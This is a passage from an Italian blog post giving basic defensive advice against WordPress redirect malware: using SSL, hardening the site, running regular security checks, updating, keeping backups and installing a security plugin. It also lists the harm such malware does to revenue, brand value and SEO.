6. Assicurati di avere SSLA: Idealmente, dovresti già avere SSL sul tuo sito web, ma lo includiamo per completezza. SSL garantisce che la comunicazione da e verso il sito Web sia crittografata. Anche Google sta spingendo con forza questo cambiamento e presto inizierai a vedere sanzioni SEO se non l'hai già fatto se SSL non è abilitato sul tuo sito web.
7. Proteggi WordPress: Esistono misure di rafforzamento della sicurezza comunemente note come rafforzamento di WordPress. Vorrei avvertirti di non dimenticare di seguire i fantastici suggerimenti disponibili su Internet. Alcuni di essi sono completamente non funzionanti e influenzeranno il tuo sito e l'esperienza dei visitatori.
8. Avere un piano/azioni di sicurezza da eseguire regolarmente: non basta fare una cosa una sola volta e dimenticarsene. Per lo meno, controlla regolarmente gli utenti e richiedi la reimpostazione della password. Anche l'impostazione di un registro delle attività è una buona idea, in quanto semplifica e velocizza il monitoraggio dell'attività dell'utente, che spesso può essere un segnale di allarme precoce di un sito compromesso.
9. Devi anche aggiornare tutto.R: WordPress, plug-in e temi ed esegui backup regolari.

Quali sono le conseguenze dei reindirizzamenti dannosi?

Qualsiasi hack ha un effetto terribile su un sito Web e il malware di reindirizzamento di WordPress non è diverso. Ecco solo alcuni dei modi in cui il malware può avere un impatto negativo sul tuo sito Web e sulla tua attività:

  • Perdita di redditose hai un sito e-commerce o un sito aziendale.
  • Perdita di valore del marchio a causa del reindirizzamento dei visitatori a siti illegali, fraudolenti o spam.
  • Impatto sulla SEOperché Google penalizza i siti compromessi nei suoi elenchi e contrassegna un sito compromesso in modo che i visitatori abbiano generalmente paura di visitarlo.
  • Violazione dei dati i tuoi visitatori e il tuo sito.

Ci sono molti altri modi in cui l'hacking può causare danni alla proprietà. Il fattore critico è agire rapidamente e sbarazzarsi del malware il prima possibile.

Produzione

Il malware di hacking di reindirizzamento di WordPress appare di volta in volta in un nuovo avatar. Gli hacker, e quindi il loro malware, stanno diventando sempre più intelligenti. I siti Web WordPress sono un tesoro per loro e l'unico modo per batterli è anticipare il loro gioco.

Il modo migliore per proteggere il tuo sito Web WordPress è installare un buon plug-in di sicurezza dotato anche di un firewall integrato. Questo è, senza dubbio, il miglior investimento nella sicurezza del tuo sito web.

Leggendo questo articolo:

Grazie per aver letto: AIUTO SEO | NICOLA.TOP

Quanto è stato utile questo post?

Clicca su una stella per valutarla!

Voto medio 5 / 5. Conteggio dei voti: 543

Nessun voto finora! Sii il primo a valutare questo post.

Potrebbero interessarti anche...

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

uno × cinque =